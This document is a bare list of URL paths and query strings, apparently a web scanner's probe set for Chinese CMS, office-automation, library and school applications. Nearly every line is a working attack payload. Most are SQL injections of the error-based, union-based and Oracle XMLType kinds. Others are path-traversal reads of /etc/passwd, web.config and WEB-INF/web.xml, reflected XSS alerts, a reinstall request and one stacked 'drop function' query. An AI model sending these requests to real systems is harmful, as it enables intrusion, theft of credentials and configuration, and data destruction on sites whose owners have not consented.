/admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
/post.php?act=phpok&id=12
/weixin/index.php?m=index&c=index
/work_flow/formOptJSPUpload.jsp?flag=1
/work_flow/formStartJSPUpload.jsp?flag=1
/admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
/public/editor/tpsc1.jsp?flag=sc
/outImg?imgPath=c:/boot.ini
/outImg?imgPath=/etc/passwd
/gsgl.asp?stype=
/common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/piw/Member/UploadMemberAttach.jsp
/piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
/piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
/cardload.jsp?filename=../etc/passwd&maininfo_id=-12
/systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
/show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
/FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
/Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
/news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
/OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
/Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
/wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
/answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
/member.php?act=updateinfo
/site56/LmsOrder/trackOrder.jspx
/house/ProcManage/WebHouse/HousePic.aspx
/CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
/FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
/loginverify.asp
/newssearch.cfm
/mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
/news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/down.aspx?Url=../web.config
/showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
/sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
/opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
/getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
/getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
/MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
/install/install.php.lock?step=2
/cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
/getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
/web.config.file.aspx
/wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
/information/changeState.asp
/MessageList.asp?action=search
/bangong/GroupInforDo.asp
/bangong/ShortCutInforDo.asp
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
/shownews.aspx?newsno=-1'%20and%201=char(106)%20--
/nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
/ratercp.php?action=savepassword
/admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/admincp.php?action=constructionresults&todo=del
/admincp.php?action=declarepublish&todo=del
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
/index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?action=search&todo=site
/index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
/include/upload.inc.php
/admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
/admincp.php?action=vote&todo=savevote
/admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
/admincp.php?action=/../teach/sitebook&id=1
/seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
/complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
/list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/index_communicate.php
/file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
/pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
/pub/search/default.asp?id=-1/**/and/**/1=char(106)--
/pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
/index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
/DownLoad.aspx?mu=../&fn=web.config&newname=web.config
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
/NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
/WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
/pt/edu/stuTransfer.aspx
/NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
/news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
/news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
/allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/download2.aspx?fn=../web.config
/DownLoad.aspx?Accessory=../index.aspx
/mod/news/qianshoucount.php
/mod/card/quest.php?op=get_m
/mod/home/quest.php?op=get_group_list
/NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
/NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
/js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
/ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
/news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
/jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/scrp/book.cfm?sKeyword=1&sFieldName=bname
/main/
/asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
/getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
/install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
/module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
/myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
/Logon?action=logon
/UserSecurityController.do?method=getPassword&step=2&userName=admin
/webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
/common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
/OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
/showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
/general/crm/apps/crm/include/import/export.php
/Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
/Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
/admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
/cms/conf/system.xml
/erp/reportmanage/taskreport/lljinduadd.aspx
/oa/erp/SalePlan/YearPlanAdd.aspx
/oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
/oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
/oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
/downTemp.aspx?type=downDb&fileName=../web.config
/showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
/user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
/admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
/admin/manage.jsp
/shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
/content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
/mod/shop/quest/ajax.php?op=auction_buy
/wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
/news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
/mod/payment/quest.php?op=check&page=b2b
/mod/ntga/jwsview.php
/uploadd.php
/jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
/admin/backup.aspx
/mod/mad/video_upload.php
/business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
/SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
/Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
/frontProduct/search.ac
/Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
/Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
/FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
/website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
/opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/framework/dbfile/createdbfile.jsp
/CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
/interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
/general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
/general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
/backup/backup/backup.asp
/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
/admini/item/iteminfo.aspx
/admini/newstopic/newstopicinfo.aspx
/download?fileName=/WEB-INF/web.xml
/RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
/index_lnlqcj.php
